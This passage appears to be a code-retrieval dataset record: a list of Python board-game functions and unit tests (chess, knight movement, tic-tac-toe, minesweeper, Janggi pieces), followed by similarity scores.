= [ each.strip() for each in\n \"\"\". . . . . . . .\n . . . . . . . .\n . . . . . . . .\n . . . S . . . .\n . . . x . . . .\n . . . x K . . .\n . . . . . . . .\n . . . . . . . .\"\"\".split('\\n')]\n expected_out = '\\n'.join(out_list)\n self.assertEqual(my_out, expected_out)\n # try to go back without strict mode\n move_choice = 3\n k1.execute_move(move_choice, strict=False)\n # confirm lack of movement\n self.assertTrue((k1.position == np.array((4, 2), dtype='int')).all())\n # confirm state of board\n with capture_output() as (out, _):\n b1.display()\n my_out = out.getvalue().strip()\n out.close()\n out_list = [ each.strip() for each in\n \"\"\". . . . . . . .\n . . . . . . . .\n . . . . . . . .\n . . . S . . . .\n . . K x . . . .\n . . x x S . . .\n . . . . . . . .\n . . . . . . . .\"\"\".split('\\n')]\n expected_out = '\\n'.join(out_list)\n self.assertEqual(my_out, expected_out)", "def make_move(self, move, check_valid=True):\r\n self.board[move.sr][move.sc] = \"--\"\r\n self.board[move.er][move.ec] = move.pieceMoved\r\n self.moveLog.append(move)\r\n self.turn_white = not self.turn_white\r\n if move.pieceMoved == 'wk':\r\n self.wKingPos = (move.er, move.ec)\r\n elif move.pieceMoved == 'bk':\r\n self.bKingPos = (move.er, move.ec)\r\n\r\n if move.isEnpassantMove:\r\n self.board[move.sr][move.ec] = \"--\"\r\n\r\n if move.pieceMoved[1] == 'p' and abs(move.sr - move.er) == 2:\r\n self.enpas_pos = ((move.er + move.sr) // 2, move.ec)\r\n else:\r\n self.enpas_pos = ()\r\n\r\n if move.isPawnPromotion and not check_valid:\r\n promoted_piece = \"a\"\r\n while promoted_piece not in ('q', 'r', 'b', 'n'):\r\n promoted_piece = input(\"Promote to q, r, b, or n: \")\r\n self.board[move.er][move.ec] = move.pieceMoved[0] + promoted_piece\r\n\r\n # castle\r\n if move.castle:\r\n if move.ec - move.sc == 2:\r\n self.board[move.er][move.ec - 1] = self.board[move.er][move.ec + 1]\r\n self.board[move.er][move.ec + 1] = '--'\r\n else:\r\n self.board[move.er][move.ec + 1] = self.board[move.er][move.ec - 2]\r\n self.board[move.er][move.ec - 2] = '--'\r\n\r\n # castle rights on rook, king move\r\n self.update_castle_rights(move)\r\n self.castleRightsLog.append(CastleRights(self.cr_castle_r.wks, self.cr_castle_r.bks,\r\n self.cr_castle_r.wqs, self.cr_castle_r.bqs))", "def _finish_all_moves(self, current_time):\n\t\tfor piece_id in self.all_piece_ids:\n\t\t\tstate = getattr(self, piece_id)\n\t\t\tif len(state) == 0:\n\t\t\t\tcontinue\n\t\t\tpiece = Piece(state)\n\t\t\tif piece.moving:\n\t\t\t\tif piece.end_time <= current_time:\n\t\t\t\t\tself._finish_move(piece_id, piece, current_time)", "def actions(board):\n avail_moves = set()\n\n for i in range(3):\n for j in range(3):\n if board[i][j] == EMPTY:\n avail_moves.add((i,j))\n \n if len(avail_moves) == 0:\n return 0\n\n return avail_moves", "def randomMove(board):\r\n go = True\r\n while go:\r\n y = random.randint(0, board.size - 1)\r\n x = random.randint(0, board.size - 1)\r\n go = not board.validMove((y, x))\r\n return (y, x)", "def untried_actions(self):\r\n if self._untried_actions is None:\r\n self._untried_actions = self.state.get_legal_moves()\r\n return self._untried_actions", "def check_legal(self, cur_pos, new_pos, board, state):\n new_row = self.ind(new_pos)[0]\n new_col = self.ind(new_pos)[1]\n cur_row = self.ind(cur_pos)[0]\n cur_col = self.ind(cur_pos)[1]\n \n if state == \"UNFINISHED\":\n # Make sure the position you're going into isn't your own piece\n if board[new_row][new_col] is not None:\n if self.piece_type(new_pos, board).get_color() == 
self._color:\n return False\n # Check if you're in the palace\n if new_pos in self._special: # Make sure that the piece it's trying to take isn't it's own\n if board[new_row][new_col] is not None:\n if self.piece_type(new_pos, board).get_color() == self._color:\n return False \n # Checking if the movement is left or right (one column apart) from the cur_pos\n if (new_col == cur_col + 1 or new_col == cur_col - 1) and new_row == cur_row:\n return True\n\n # Checking if forward movement is legal\n elif self._color == 'BLUE':\n print(\"this soldier is blue\")\n if new_row == cur_row - 1 and new_col == cur_col:\n print(\"The blue soldier is trying to move forward\")\n # cant take your own piece\n if self.piece_type(new_pos, board) is not None:\n print(\"There's a piece here\")\n if self.piece_type(new_pos, board).get_color == self._color:\n print(\"Trying to take it's own color piece\")\n return False\n return True\n elif self._color == 'RED':\n print(\"this soldier is red\")\n if new_row == cur_row + 1 and new_col == cur_col:\n print(\"The red soldier is trying to move forward\")\n if self.piece_type(new_pos, board) is not None:\n print(\"There's a piece here\")\n if self.piece_type(new_pos, board).get_color == self._color:\n print(\"Trying to take it's own color piece\")\n return False\n return True\n else:\n return False\n else:\n return False", "def is_legal_move(self, start_pos, end_pos, start_piece, end_piece_player_id, board):\r\n parsed_positions = self.parse_positions(start_pos, end_pos)\r\n\r\n start_row = parsed_positions[0]\r\n start_col = parsed_positions[1]\r\n end_row = parsed_positions[2]\r\n end_col = parsed_positions[3]\r\n count = 0 # Count will track how many pieces are between start and end_pos\r\n\r\n if start_row != end_row and start_col != end_col: # Moving diagonally\r\n return False\r\n\r\n # If cannon moves to an empty position\r\n # if end_piece_player_id is None:\r\n\r\n if start_row == end_row: # Moving horizontally\r\n col_difference = end_col - start_col\r\n\r\n if col_difference > 0: # Moving to the right of the board\r\n for col in range(start_col + 1, end_col): # Checks if there is a piece between start_col and end_col\r\n if board[start_row][col].get_piece() is not None:\r\n count += 1\r\n\r\n if col_difference < 0: # Moving to the left of the board\r\n for col in range(start_col - 1, end_col, -1): # Checks to the left of the board\r\n # If there is a piece to block movement to the end_pos, return False\r\n if board[start_row][col].get_piece() is not None:\r\n count += 1\r\n\r\n if start_col == end_col: # Moving vertically\r\n row_difference = end_row - start_row\r\n\r\n if row_difference > 0: # Moving down the board\r\n for row in range(start_row + 1, end_row):\r\n if board[row][start_col].get_piece() is not None: # If no piece is impeding path to end_pos\r\n count += 1\r\n\r\n\r\n if row_difference < 0: # Moving up the board\r\n for row in range(start_row -1, end_row, -1):\r\n if board[row][start_col].get_piece() is not None: # If no piece is impeding path to end_pos\r\n count += 1\r\n\r\n # 1 piece between start_pos and end_pos and end_pos contains a chess piece\r\n if count == 1 and end_piece_player_id is not None:\r\n return True\r\n # end_pos has no piece and there are no pieces to impede path\r\n elif end_piece_player_id is None and count == 0:\r\n return True\r\n # Returns False for all other scenarios\r\n else:\r\n return False", "def check_move_states(self, player, depth):\n\n if depth >= self.look_ahead:\n return True\n\n for move in 
gen_moves(player, self.__state.board, self.checker):\n self.__state.push(move)\n winner = self.checker.check_game_over(self.__pid, self.__opponent)\n if winner == self.__opponent:\n return False\n worker = move['xy2']\n if not self.check_build_states(player, worker, depth):\n return False\n self.__state.pop()\n return True", "def make_random_move(self):\n # get copy of the empty board\n board = set([(i, j) for i in range(self.height) for j in range(self.width)])\n\n for move in board:\n if not move in self.moves_made and not move in self.mines:\n return move\n\n return None", "def test_out_of_maze_colision(self):\n manager = DummyLevelManager()\n game = Game(manager)\n game.move(GameMoves.DOWN)\n for i in range(5):\n state = game.move(GameMoves.PASS)\n self.assertEquals(state, LevelState.RUNNING)\n state = game.move(GameMoves.PASS)\n self.assertEqual(state, LevelState.LOSE)", "def make_safe_move(self):\n \n safe_moves = self.safes.copy()\n\n safe_moves -= self.moves_made\n\n if len(safe_moves) == 0:\n return None\n\n return safe_moves.pop()", "def cancel_move(self):\n self.should_move = False", "def op_move_postconditions(self,oldPieceCoords,newPieceCoords):\n\n # Start of new state constrution\n next_gs_board = Board.from_binary_matrix(self.board)\n next_gs_board.set_element(newPieceCoords[0], newPieceCoords[1], self.curr_player)\n next_gs_board.remove_element(oldPieceCoords[0], oldPieceCoords[1])\n next_gs_next_player = self.curr_player\n next_gs_next_move = self.FREE\n next_gs_next_pieces = set()\n\n new_gs = Eximo(next_gs_next_player,next_gs_next_move,next_gs_next_pieces,next_gs_board)\n new_gs.last_piece = newPieceCoords\n\n # Check if moved piece has reached opposite side\n if(new_gs.reach_otherside(newPieceCoords)):\n new_gs.board.remove_element(newPieceCoords[0], newPieceCoords[1])\n new_gs.next_move = self.ADDPIECE_2\n new_gs.next_pieces = new_gs.addition_viable_tiles()\n new_gs.perform_checkup()\n\n else:\n new_gs.curr_player = self.get_enemy(self.curr_player)\n\n # Check if the next_piece checkup needs to be made\n if new_gs.curr_player == self.get_enemy(self.curr_player):\n new_gs.perform_checkup()\n\n return new_gs", "def valid_moves(self, index: Tuple[int, int], board: hive.board.Board) -> Set[Tuple[int, int]]:\n raise NotImplementedError()", "def ai_move():\n\tinitial_state = map(get_filled_edges, rects)\n\tpossible_moves = []\n\tfor index, filled_edges in enumerate(initial_state):\n\t\tif filled_edges == 0:\n\t\t\tpossible_moves.extend([(index, i) for i in 'ltrb'])\n\t\telif filled_edges == 1:\n\t\t\tpossible_moves.extend(one_filled_edge(index))\n\t\telif filled_edges == 2:\n\t\t\tpossible_moves.extend(two_filled_edge(index))\n\t\telif filled_edges == 3:\n\t\t\tpossible_moves.extend(three_filled_edge(index))\n\tprint possible_moves\n\tpossible_decisions = []\n\tfor move in possible_moves:\n\t\tfinal_state = apply_move(move)\n\t\tpossible_decisions.append(is_feasible(initial_state, final_state))\n\tprint possible_decisions\n\t# randomizing when some decisions have the same weight\n\tmax_weight = max(possible_decisions)\n\t# list of indices which have the same weight\n\tmax_indices = []\n\tfor index, weight in enumerate(possible_decisions):\n\t\tif weight == max_weight:\n\t\t\tmax_indices.append(index)\n\tx = choice(max_indices)\n\tprint x\n\treturn possible_moves[x]\n\t# return possible_moves[possible_decisions.index(max(possible_decisions))]", "def reset(self) -> None:\n self.moves_taken = []", "def legalMoves( self, row, col):\n moves = []\n if(row != 0 and self.board[row 
- 1][col] == 0):\n moves.append(0)\n if(col != self.n - 1 and self.board[row][col + 1] == 0):\n moves.append(2)\n if(row != self.n - 1 and self.board[row + 1][col] == 0):\n moves.append(4)\n if(col != 0 and self.board[row][col - 1] == 0):\n moves.append(6)\n \n if (row + col) % 2 == 0: # can follow the cross\n if (row != 0 and col != 0 and self.board[row - 1][col - 1] == 0):\n moves.append(7)\n if (row != 0 and col != self.n - 1 and self.board[row - 1][col + 1] == 0):\n moves.append(1)\n if (row != self.n - 1 and col != self.n - 1 and self.board[row + 1][col + 1] == 0):\n moves.append(3)\n if (row != self.n - 1 and col != 0 and self.board[row + 1][col - 1] == 0):\n moves.append(5)\n\n return moves", "def test_move_onto_past(self):\n b1 = board.Board(self.small_plain)\n start = np.array((3, 3), dtype='int')\n k1 = knight.Knight(b1,start)\n # set move choice 0\n move_choice = 0\n # change the board layout to reflect the move\n k1.execute_move(move_choice)\n self.assertTrue((k1.position == np.array((5, 4), dtype='int')).all())\n # try to go back in strict mode (fail)\n move_choice = 4\n k1.execute_move(move_choice, strict=True)\n # confirm lack of movement\n self.assertTrue((k1.position == np.array((5, 4), dtype='int')).all())\n # confirm state of board\n with capture_output() as (out, _):\n b1.display()\n my_out = out.getvalue().strip()\n out.close()\n out_list = [ each.strip() for each in\n \"\"\". . . . . . . .\n . . . . . . . .\n . . . . . . . .\n . . . S . . . .\n . . . x . . . .\n . . . x K . . .\n . . . . . . . .\n . . . . . . . .\"\"\".split('\\n')]\n expected_out = '\\n'.join(out_list)\n self.assertEqual(my_out, expected_out)\n # try to go back without strict mode\n move_choice = 4\n k1.execute_move(move_choice)\n # confirm lack of movement\n self.assertTrue((k1.position == np.array((3, 3), dtype='int')).all())\n # confirm state of board\n with capture_output() as (out, _):\n b1.display()\n my_out = out.getvalue().strip()\n out.close()\n out_list = [ each.strip() for each in\n \"\"\". . . . . . . .\n . . . . . . . .\n . . . . . . . .\n . . . K x . . .\n . . . x x . . .\n . . . x S . . .\n . . . . . . . .\n . . . . . . . .\"\"\".split('\\n')]\n expected_out = '\\n'.join(out_list)\n self.assertEqual(my_out, expected_out)", "def move_invalid():\n check50.run(run_command).stdin(\"EAST\").stdout(\"Invalid command.\")" ]
[ "0.7330048", "0.7140586", "0.7039396", "0.697742", "0.69300544", "0.6770414", "0.676601", "0.6749859", "0.66704226", "0.66598386", "0.66426575", "0.66328067", "0.6632505", "0.66169274", "0.6604243", "0.65838623", "0.65772635", "0.6562603", "0.6525635", "0.6522035", "0.6512511", "0.6508177", "0.65074694", "0.64962894", "0.649275", "0.64880174", "0.6487537", "0.6485876", "0.64521384", "0.64492553", "0.644339", "0.6433632", "0.6427241", "0.6413817", "0.6411838", "0.6405281", "0.6404856", "0.640213", "0.6398353", "0.6391051", "0.63881075", "0.6387365", "0.63795376", "0.63748527", "0.6360954", "0.6348344", "0.6338555", "0.6322776", "0.63197756", "0.63160706", "0.63146466", "0.6309299", "0.6291828", "0.62878144", "0.6285332", "0.62805444", "0.6276508", "0.62728804", "0.6270854", "0.6265325", "0.62535477", "0.62464005", "0.6243859", "0.62199926", "0.62085533", "0.6204817", "0.6189746", "0.61852545", "0.6178696", "0.6177592", "0.61707044", "0.6168047", "0.6155129", "0.61474293", "0.6143239", "0.61329615", "0.6130371", "0.61216563", "0.6119402", "0.61167103", "0.6108297", "0.61028385", "0.6092757", "0.6091817", "0.60832435", "0.60825306", "0.60811925", "0.6077865", "0.6075925", "0.6071631", "0.60650927", "0.60582495", "0.6054288", "0.60519344", "0.6049257", "0.6042182", "0.60388064", "0.60384065", "0.60364723", "0.60340476" ]
0.63703394
44
Checks a string input for the format [Row][ColLetter] or [ColLetter][Row] (not case sensitive)
def parsePosition(self, parse):
        if len(parse) == 2:
            ch1 = ord(parse[0].lower())
            ch2 = ord(parse[1].lower())
            maxNum = 48 + self.board.size  # ascii of max row #
            # [Row#][ColLetter] case
            if 48 < ch1 <= maxNum and 97 <= ch2 < (97 + self.board.size):
                return maxNum - ch1, ch2 - 97  # actual grid indexes of desired position
            # [ColLetter][Row#] case
            if 48 < ch2 <= maxNum and 97 <= ch1 < (97 + self.board.size):
                return maxNum - ch2, ch1 - 97  # actual grid indexes of desired position
        return False
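A minimal usage sketch of the parser above, not part of the original dataset row: Board and Game are hypothetical stand-ins assumed only to expose a board.size attribute (8 for a standard grid), and the parsing logic is reproduced verbatim so the sketch runs standalone. It shows that "a8" and "8A" resolve to the same grid index and that malformed input falls through to False.

# Sketch only: Board/Game are assumed stand-ins, not classes from the original source.
class Board:
    def __init__(self, size=8):
        self.size = size  # number of rows/columns on the square board


class Game:
    def __init__(self, size=8):
        self.board = Board(size)

    # Same parsing logic as the document above, copied so this example is self-contained.
    def parsePosition(self, parse):
        if len(parse) == 2:
            ch1 = ord(parse[0].lower())
            ch2 = ord(parse[1].lower())
            maxNum = 48 + self.board.size  # ascii code of the highest row digit
            # [Row#][ColLetter] case
            if 48 < ch1 <= maxNum and 97 <= ch2 < (97 + self.board.size):
                return maxNum - ch1, ch2 - 97
            # [ColLetter][Row#] case
            if 48 < ch2 <= maxNum and 97 <= ch1 < (97 + self.board.size):
                return maxNum - ch2, ch1 - 97
        return False


g = Game(8)
print(g.parsePosition("a8"))  # (0, 0) -- row 8 is the top grid row, column 'a' is index 0
print(g.parsePosition("8A"))  # (0, 0) -- order and case do not matter
print(g.parsePosition("h1"))  # (7, 7)
print(g.parsePosition("z9"))  # False -- out of range for an 8x8 board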
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_valid_row_or_col(val: str):\n try:\n val = int(val)\n if 1 <= val <= 10:\n return True\n return False\n except (ValueError, TypeError):\n return False", "def must_contain_letter(cell):\n # Check if it's nan first\n if check_empty(cell):\n return True\n return not bool(re.search(\"[a-zA-Z]\", str(cell)))", "def valid_col_tester(self, state):\n vert_state = self.cols(state)\n for line in vert_state:\n line_index = vert_state.index(line)\n vert_word = self.check_word(vert_state[line_index])\n if not(vert_word):\n return False\n return True", "def valid_input(self, row, col):\n return ((row, col) not in self.marks and\n row <= WIDTH and row > 0 and\n col in COL_MAP)", "def test_has_letter(row):\n assert not sudoku.no_letters(row)", "def is_cols_valid(bd):\n for col in cols:\n seen = []\n for num in nums:\n if bd[col[num]] == \" \":\n continue\n elif bd[col[num]] not in seen:\n seen += [bd[col[num]]]\n else:\n return False\n else:\n continue\n return True", "def validRowCol(content,start,row,schedule):\n\t\t\tif validRow(content,start,row) and \\\n\t\t\t\tvalidCol(content,start,schedule):\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False", "def _validate_level(self, levelText):\n if len([line for line in levelText.splitlines() if line.strip()]) != 6:\n # wrong num rows\n return False\n \n if any(len(list(line)) != 6 for line in levelText.splitlines() if line.strip()):\n # wrong num cols\n return False\n\n return True", "def is_latin_square(row_length: int, array: str) -> bool:\n # check horizontally\n row = 1\n column = 0\n numbers = []\n\n for index, digit in enumerate(array):\n # check for new row\n if index % row_length == 0:\n row += 1\n column = 0\n numbers = []\n column += 1\n print(index, digit, column, row)\n # check whether the digit is already in the current row\n if digit in numbers:\n return False\n numbers.append(digit)\n\n # check vertically\n\n return True", "def check_matrix(self, mat: Matrix) -> bool:\n matrix_expected_row_len = len(\n max([self.left_to_right_regexes, self.right_to_left_regexes], key=len)\n )\n matrix_row_strings = [\n ''.join(mat[i][j] for j in range(mat.columns)) for i in range(mat.rows)\n ]\n if matrix_expected_row_len != len(matrix_row_strings):\n raise ValueError(\n f'Matrix with {len(matrix_row_strings)} rows is incompatible with level of {matrix_expected_row_len} rows.'\n )\n\n matrix_expected_column_len = len(\n max([self.up_to_down_regexes, self.down_to_up_regexes], key=len)\n )\n matrix_column_strings = [\n ''.join(mat[j][i] for j in range(mat.rows)) for i in range(mat.columns)\n ]\n if matrix_expected_column_len != len(matrix_column_strings):\n raise ValueError(\n f'Matrix with {len(matrix_column_strings)} columns is incompatible with level of {matrix_expected_column_len} columns.'\n )\n\n for row, utd_regex, dtu_regex in itertools.zip_longest(\n matrix_column_strings,\n self.up_to_down_regexes,\n self.down_to_up_regexes,\n fillvalue=re.compile(''),\n ):\n if (utd_regex.pattern and re.fullmatch(utd_regex, row) is None) or (\n dtu_regex.pattern and re.fullmatch(dtu_regex, row) is None\n ):\n return False\n\n for row, ltr_regex, rtl_regex in itertools.zip_longest(\n matrix_row_strings,\n self.left_to_right_regexes,\n self.right_to_left_regexes,\n fillvalue=re.compile(''),\n ):\n if (ltr_regex.pattern and re.fullmatch(ltr_regex, row) is None) or (\n rtl_regex.pattern and re.fullmatch(rtl_regex, row) is None\n ):\n return False\n\n return True", "def valid_coordinate(self,row,column):\r\n if row >= 0 and row < len(self.wordsearch):\r\n if 
column >= 0 and column < len(self.wordsearch[0]):\r\n return True\r\n return False", "def human_go(self, board):\r\n coord_pattern = re.compile(\"[0-{}]$\".format(board.shape[1]))\r\n print(\"Enter Column and press enter.\")\r\n input_str = input(\"(from 0-6)\\n\")\r\n if not coord_pattern.match(input_str):\r\n print(\"That is not in the right format, please try again...\")\r\n return self.human_go(board)\r\n else:\r\n col = int(input_str)\r\n if board[0][col] != 0:\r\n print(\"That column is already full, please try again\")\r\n self.human_go()\r\n else:\r\n for row in board[::-1]:\r\n if row[col] == 0:\r\n row[col] = -1\r\n return board", "def validate_bed_format(row):\n assert len(row) >= 3, 'Bed Files must have at least 3 tab separated fields.'\n\n return True", "def _formatMatriculaValid(np):\n return len(np)==7 and np[:4].isdigit() and np[4:].isalpha()", "def parseCol(input):\n try:\n parsed = ord(input.upper()) - ord('A')\n except AttributeError:\n raise PositionException, \"Bad input for col; %s\" % input\n if not 0 <= parsed < CHESS_COLS:\n raise PositionException, \"Col out of range; %s parsed as %d.\" \\\n % (input, parsed)\n return parsed", "def is_rows_valid(bd):\n for row in rows:\n seen = []\n for num in nums:\n if bd[row[num]] == \" \":\n continue\n elif bd[row[num]] not in seen:\n seen += [bd[row[num]]]\n else:\n return False\n else:\n continue\n return True", "def test_asciitable_m_sep_char_in_cell(self):\n input = '''\n| Author | yada | yada2 | yada3 | yada4 | yada5 | yada6 | yada7 |\n├─────────────────┼─────────────┼─────────────────┼─────────────────┼─────────────────┼─────────────────┼────────────┼─────────────────┤\n│ Kelly Brazil │ │ a76d46f9ecb1eff │ kellyjonbrazil@ │ Fri Feb 4 12:14 │ refactor ignore │ 1644005656 │ │\n│ │ │ 4d6cc7ad633c97c │ gmail.com │ :16 2022 -0800 │ _exceptions │ │ │\n│ │ │ ec0e99001a │ │ │ │ │ │\n├─────────────────┼─────────────┼─────────────────┼─────────────────┼─────────────────┼─────────────────┼────────────┼─────────────────┤\n│ Kevin Lyter │ │ 6b069a82d0fa19c │ lyterk@sent.com │ Thu Feb 3 18:13 │ Add xrandr to l │ 1643940838 │ │\n│ │ │ 8d83b19b934bace │ │ :58 2022 -0800 │ ib.py │ │ │\n│ │ │ 556cb758d7 │ │ │ │ │ │\n├─────────────────┼─────────────┼─────────────────┼─────────────────┼─────────────────┼─────────────────┼────────────┼─────────────────┤\n│ Kevin Lyter │ │ 6b793d052147406 │ lyterk@sent.com │ Thu Feb 3 18:13 │ Clean up types │ 1643940791 │ │\n│ │ │ f388c4d5dc04f50 │ │ :11 2022 -0800 │ │ │ │\n│ │ │ 6a3456f409 │ │ │ │ │ │\n│ │ │ │ │ │ * | operator = │ │ │\n│ │ │ │ │ │ > Union[] │ │ │\n│ │ │ │ │ │ * Rem │ │ │\n│ │ │ │ │ │ ove unused impo │ │ │\n│ │ │ │ │ │ rt Iterator │ │ │\n│ │ │ │ │ │ * R │ │ │\n│ │ │ │ │ │ emove comment │ │ │\n├─────────────────┼─────────────┼─────────────────┼─────────────────┼─────────────────┼─────────────────┼────────────┼─────────────────┤\n│ Kevin Lyter │ │ ce9103f7cc66689 │ lyterk@sent.com │ Thu Feb 3 18:12 │ Delete old file │ 1643940766 │ │\n│ │ │ 5dc7840d32797d8 │ │ :46 2022 -0800 │ s in template f │ │ │\n│ │ │ c7274cf1b8 │ │ │ older │ │ │\n├─────────────────┼─────────────┼─────────────────┼─────────────────┼─────────────────┼─────────────────┼────────────┼─────────────────┤\n '''\n expected = [\n {\n \"author\": \"Kelly Brazil\",\n \"yada\": None,\n \"yada2\": \"a76d46f9ecb1eff\\n4d6cc7ad633c97c\\nec0e99001a\",\n \"yada3\": \"kellyjonbrazil@\\ngmail.com\",\n \"yada4\": \"Fri Feb 4 12:14\\n:16 2022 -0800\",\n \"yada5\": \"refactor ignore\\n_exceptions\",\n \"yada6\": \"1644005656\",\n \"yada7\": 
None\n },\n {\n \"author\": \"Kevin Lyter\",\n \"yada\": None,\n \"yada2\": \"6b069a82d0fa19c\\n8d83b19b934bace\\n556cb758d7\",\n \"yada3\": \"lyterk@sent.com\",\n \"yada4\": \"Thu Feb 3 18:13\\n:58 2022 -0800\",\n \"yada5\": \"Add xrandr to l\\nib.py\",\n \"yada6\": \"1643940838\",\n \"yada7\": None\n },\n {\n \"author\": \"Kevin Lyter\",\n \"yada\": None,\n \"yada2\": \"ce9103f7cc66689\\n5dc7840d32797d8\\nc7274cf1b8\",\n \"yada3\": \"lyterk@sent.com\",\n \"yada4\": \"Thu Feb 3 18:12\\n:46 2022 -0800\",\n \"yada5\": \"Delete old file\\ns in template f\\nolder\",\n \"yada6\": \"1643940766\",\n \"yada7\": None\n }\n ]\n\n self.assertEqual(jc.parsers.asciitable_m.parse(input, quiet=True), expected)", "def is_roi_col(col_name):\n return re.match(r\"[L|R][0-9]+$\", col_name)", "def _check_column(self):\n for column in np.transpose(self._board):\n col_string = ''.join(column)\n match = re.search(WIN_REGEX, col_string)\n if match:\n return match.group()[0]\n return None", "def split_well_name (well_name):\n\n letters = well_name.rstrip('0123456789')\n\n nums = well_name.lstrip(letters)\n\n\n #Do some checks to make sure it's a well name in for the format letter-letter-#-#\n if len(nums) == 0:\n raise ValueError('Something is wrong with your input, I cannot find a row number')\n\n\n for i in '0123456789':\n if i in letters:\n raise ValueError('Something is wrong with your input, I think there is a number in your column letter.')\n\n for j in nums:\n if j not in '0123456789':\n raise ValueError('Something is wrong with your input, I think there is a letter in your row number.')\n\n return letters, nums", "def valid_column(self, col: int) -> bool:\n\n return self.check_bounds(0, col) and self.grid[0][col] == \" \"", "def _is_valid_key(self, key):\n\t\t\n\t\t# If the key is not a string\n\t\tif not isinstance(key, str):\n\t\t\treturn False\n\t\telse:\n\t\t\tkey = str.upper(key)\n\t\t\n\t\t# If the given key does not match the standard notation XY\n\t\tif len(key) != 2:\n\t\t\treturn False\n\t\t\n\t\t# If the key is out of the board\n\t\tif key[0] not in self.columns or key[1] not in self.rows:\n\t\t\treturn False\n\t\t\n\t\t# Otherwise the key is valid\n\t\treturn True", "def __sudoku(A):\r\n if not sudoku_isready(A):\r\n print(\"Invalid Grid\")\r\n return None\r\n else:\r\n n = len(A)\r\n x, seen = isqrt(n), [0 for i in range(n)]\r\n for i in range(n):\r\n line = sudoku_getline(A, i)\r\n for v in line:\r\n if v in seen:\r\n return \"Invalid\"\r\n else:\r\n seen[i] = v\r\n seen = [0 for i in range(n)]\r\n for i in range(n):\r\n line = sudoku_getcol(A, i)\r\n for v in line:\r\n if v in seen:\r\n return \"Invalid\"\r\n else:\r\n seen[i] = v\r\n seen = [0 for i in range(n)]\r\n for i in range(n):\r\n line = sudoku_region_to_line(sudoku_getregion(A, i))\r\n for v in line:\r\n if v in seen:\r\n return \"Invalid\"\r\n else:\r\n seen[i] = v\r\n seen = [0 for i in range(n)]\r\n return \"Valid\"", "def _validateRowCol(self, rows, cols, numRow, numCol, dvName):\n if rows is not None:\n rowArr = np.array(rows)\n if np.max(rowArr) > numRow:\n raise Error(\n \"Design variable \"\n + dvName\n + \" slice out of bounds. \"\n + \"Design var has \"\n + str(numRow)\n + \" rows and index up to \"\n + str(np.max(rowArr))\n + \" was specified: \"\n + str(rows)\n )\n if np.min(rowArr) < 1:\n raise Error(\n \"Design variable \"\n + dvName\n + \" slice out of bounds. 
\"\n + \"Row index less than 1 specified: \"\n + str(rows)\n )\n if len(rows) != len(set(rows)):\n # duplicates\n raise Error(\"Duplicate indices specified in the rows of design variable \" + dvName + \": \" + str(rows))\n\n if cols is not None:\n colArr = np.array(cols)\n if np.max(colArr) > numCol:\n raise Error(\n \"Design variable \"\n + dvName\n + \" slice out of bounds. \"\n + \"Design var has \"\n + str(numCol)\n + \" cols and index up to \"\n + str(np.max(colArr))\n + \" was specified: \"\n + str(cols)\n )\n if np.min(colArr) < 1:\n raise Error(\n \"Design variable \"\n + dvName\n + \" slice out of bounds. \"\n + \"col index less than 1 specified: \"\n + str(cols)\n )\n if len(cols) != len(set(cols)):\n # duplicates\n raise Error(\"Duplicate indices specified in the cols of design variable \" + dvName + \": \" + str(cols))", "def valid_guess(self, row, col):\n # if row nor col is at an edge space, returns False\n if not isinstance(row, int) or not isinstance(col, int):\n return False\n # ensures no corner spaces have been selected\n if row < 1 or row > 8:\n return False\n if col < 1 or col > 8:\n return False\n return True", "def check_horizontal_rule(line):\n if line.count('-') >= 3 and contains_only_char(line, '-'):\n return True, '<hr></hr>'\n if line.count('*') >= 3 and contains_only_char(line, '*'):\n return True, '<hr></hr>'\n if line.count('_') >= 3 and contains_only_char(line, '_'):\n return True, '<hr></hr>'\n return False, ''", "def checkRows( self ):\n\n for x in [0,3,6]:\n firstVal = self.__grid[x]\n secondVal = self.__grid[x+1]\n thirdVal = self.__grid[x+2]\n\n compiledVal = str(firstVal) + str(secondVal) + str(thirdVal)\n\n if 'xx' in compiledVal.lower():\n\n return ('X', compiledVal)\n\n elif 'oo' in compiledVal.lower():\n\n return ('O', compiledVal) \n\n elif compiledVal.lower() == 'x2x' or \\\n compiledVal.lower() == 'x5x' or \\\n compiledVal.lower() == 'x8x':\n\n return ('X', compiledVal)\n \n return None", "def is_valid_index (wordsearch, line_num, col_num):\n if ((line_num >= 0) and (line_num < len(wordsearch))):\n if ((col_num >= 0) and (col_num < len(wordsearch[line_num]))):\n return True\n return False", "def checkio(game_result: List[str]) -> str:\n # row check\n for row in game_result:\n if row == \"XXX\":\n return \"X\"\n if row == \"OOO\":\n return \"O\"\n # column check\n if game_result[0][0] != '.' and game_result[0][0] == game_result[1][0] == game_result[2][0]:\n return game_result[0][0]\n if game_result[0][1] != '.' and game_result[0][1] == game_result[1][1] == game_result[2][1]:\n return game_result[0][1]\n if game_result[0][2] != '.' and game_result[0][2] == game_result[1][2] == game_result[2][2]:\n return game_result[0][2]\n # diagonal check\n if game_result[0][0] != '.' and game_result[0][0] == game_result[1][1] == game_result[2][2]:\n return game_result[1][1]\n # anti-diagonal check\n if game_result[0][2] != '.' 
and game_result[0][2] == game_result[1][1] == game_result[2][0]:\n return game_result[1][1]\n return \"D\"", "def CheckLabel(Line): \n for i in Line:\n if i == '\\t': #can't detect leading tabs, stops at the first \\ \n raise InputError(Line,\"malformed input\") \n elif i != ' ':\n break", "def validate_square(cls, square):\n if len(square) > 3:\n raise ValueError('Invalid square')\n\n cls._get_row_fow_letter(square[0])\n square_column = int(square[1:])\n if square_column not in range(1, 11):\n raise ValueError('The number of the column must be '\n 'an integer between 1 to 10')", "def check_row(row):\n \n if len(row) != _ncols:\n raise ValueError(\"Row contains {0} columns, expected {1}!\\n\\n{2}\\n\".format(len(row), _ncols, row))", "def _parse_row(row: str):\n final_row = []\n for char in row:\n\n # any number N expands into N spaces\n if char in \"12345678\":\n for i in range(int(char)):\n final_row.append(EMPTY_SPACE)\n else:\n final_row.append(char)\n\n return final_row", "def test_parse_case_field_00(input_, expected):\n actual = regex.match_case_field(input_)\n assert actual == expected", "def checker(self, match=\"xw\", ranges=\"0,1\", in_a_row=True, reverse=False):\n\n res = []\n length = len(self.parse_type)\n if ranges != None:\n ranges = str(ranges)\n index_array = self.indexes(ranges)\n substring = \"\"\n\n for idx in range(length*reverse-reverse, length*(-reverse+1)-reverse, (-reverse)*2+1): #xd lol\n if idx in index_array:\n substring += self.parse_type[idx]\n\n if in_a_row == True:\n return (match in substring)\n if 